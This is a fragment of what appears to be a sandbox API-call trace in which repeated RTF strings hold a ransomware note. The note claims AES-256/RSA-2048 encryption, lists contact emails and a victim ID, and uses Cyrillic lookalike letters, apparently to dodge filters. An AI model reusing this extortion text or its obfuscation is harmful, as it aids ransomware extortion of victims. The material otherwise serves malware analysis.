Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.714] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd 